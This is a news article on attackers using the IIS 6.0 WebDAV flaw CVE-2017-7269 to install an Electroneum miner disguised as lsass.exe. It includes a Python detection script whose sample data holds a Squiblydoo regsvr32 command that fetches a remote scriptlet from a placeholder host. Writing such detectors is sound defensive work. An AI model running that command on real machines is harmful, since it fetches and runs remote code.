Hackers are leveraging an IIS 6.0 vulnerability to take over Windows servers and install a malware strain that mines the Electroneum cryptocurrency.
Attacks aren't widespread, as they target a quite old IIS version, but they are happening at scale.
Hackers using former IIS 6.0 zero-day
Hackers are using CVE-2017-7269 to take over servers. This is a vulnerability discovered by two Chinese researchers in March 2017 that affects the WebDAV service of IIS. When it was discovered last year, the flaw was a zero-day that had already been under heavy exploitation for almost nine months, since June 2016.
Microsoft initially said it was not planning to fix the flaw because IIS 6.0 was end-of-life, and so were the operating systems that shipped with IIS 6.0 by default: Windows XP and Windows Server 2003.
But the vulnerability shared some common traits with the EXPLODINGCAN NSA exploit leaked in April 2017 by the Shadow Brokers, and it eventually received a fix in mid-June 2017.
Since then, it's been used by at least one threat actor to deploy Monero miners on Windows servers still running the old IIS 6.0 version.
Hackers using CVE-2017-7269 to install Electroneum miner
Now, F5 Labs says it found another hacker group using the same exploit, but deploying an Electroneum miner instead of Monero.
According to experts, the threat actor uses CVE-2017-7269 to deliver an ASCII shellcode containing a Return-Oriented Programming (ROP) exploit chain that installs a reverse shell on vulnerable hosts.
Attackers then use the reverse shell to download the miner and start the mining process. The infection process is masked by the use of the Squiblydoo technique and by disguising the miner as the legitimate lsass.exe (Local Security Authority Subsystem Service) process.
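As an added example (not code from the article or from the F5 Labs report), the following Python checks constructed Sysmon-style process-creation events for the two evasion tricks described above: a process named lsass.exe that does not run from System32 under wininit.exe, and regsvr32 registering a scriptlet through scrobj.dll (the Squiblydoo pattern). The event fields, paths and command lines are constructed sample data, not telemetry from the campaign.

```python
import ntpath

# Constructed process-creation events (Sysmon Event ID 1 style fields); not real telemetry.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\lsass.exe",
     "parent": r"C:\Windows\System32\wininit.exe",
     "cmdline": "lsass.exe"},
    {"image": r"C:\Windows\Temp\lsass.exe",                       # miner masquerading as lsass.exe
     "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": "lsass.exe -o pool.example.invalid:3333"},
    {"image": r"C:\Windows\System32\regsvr32.exe",                # Squiblydoo-style scriptlet load
     "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": "regsvr32 /s /n /u /i:http://example.invalid/payload.sct scrobj.dll"},
    {"image": r"C:\Windows\System32\regsvr32.exe",                # ordinary DLL registration
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": "regsvr32 /s \"C:\\Program Files\\Vendor\\thing.dll\""},
]

LEGIT_LSASS_IMAGE = r"c:\windows\system32\lsass.exe"
LEGIT_LSASS_PARENT = "wininit.exe"


def check_event(ev):
    """Return the names of the detections that fire for one process-creation event."""
    hits = []
    image = ev["image"].lower()
    name = ntpath.basename(image)
    parent = ntpath.basename(ev["parent"].lower())
    cmd = ev["cmdline"].lower()
    # The real lsass.exe lives in System32 and is started by wininit.exe;
    # any other image path or parent for that process name is suspicious.
    if name == "lsass.exe" and (image != LEGIT_LSASS_IMAGE or parent != LEGIT_LSASS_PARENT):
        hits.append("lsass_masquerade")
    # Squiblydoo: regsvr32 executing a scriptlet via scrobj.dll with an /i: argument,
    # which lets a remote or local .sct file run under a signed Microsoft binary.
    if name == "regsvr32.exe" and "scrobj.dll" in cmd and "/i:" in cmd:
        hits.append("squiblydoo_regsvr32")
    return hits


def scan(events):
    """Run check_event over a list of events; returns (event index, detection name) pairs."""
    return [(i, hit) for i, ev in enumerate(events) for hit in check_event(ev)]


if __name__ == "__main__":
    for idx, hit in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {hit} -> {SAMPLE_EVENTS[idx]['cmdline']}")
```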
F5 experts said the Electroneum address they found in attacks stored only $99, suggesting they either caught the campaign at its beginning, or the crooks are rotating address IDs to prevent researchers from tracking their entire operation.
These are also not the first crooks to mine Electroneum instead of Monero, the cryptocurrency of choice for all recent illegal mining campaigns. The Dofoil malware campaign also used Electroneum, and so did another coinminer campaign that used the legitimate CertUtil Windows utility to download the mining malware onto users' systems.
Comments
Demonslay335 - 1 week ago
Even though IIS 6.0 is deprecated, Microsoft still recommends using it as an SMTP relay for programmatic email on the local server, so many people may not realize they have it running. As long as it is restricted to localhost relaying, and no other ports/services of it are exposed though, should be fine.
thx1200 - 1 week ago
"Even though IIS 6.0 is deprecated, Microsoft still recommends using it as an SMTP relay for programmatic email on the local server, so many people may not realize they have it running. As long as it is restricted to localhost relaying, and no other ports/services of it are exposed though, should be fine."
What you are talking about is not actually IIS6. It's just a compatibility layer to expose IIS6-like APIs to applications, but under the hood it's still IIS7/8/9/10. The SMTP service you are talking about is a deprecated service, so there really isn't new development happening, and it requires IIS6 APIs to function.
Demonslay335 - 1 week ago
Ah, interesting to know. That makes much more sense, thanks!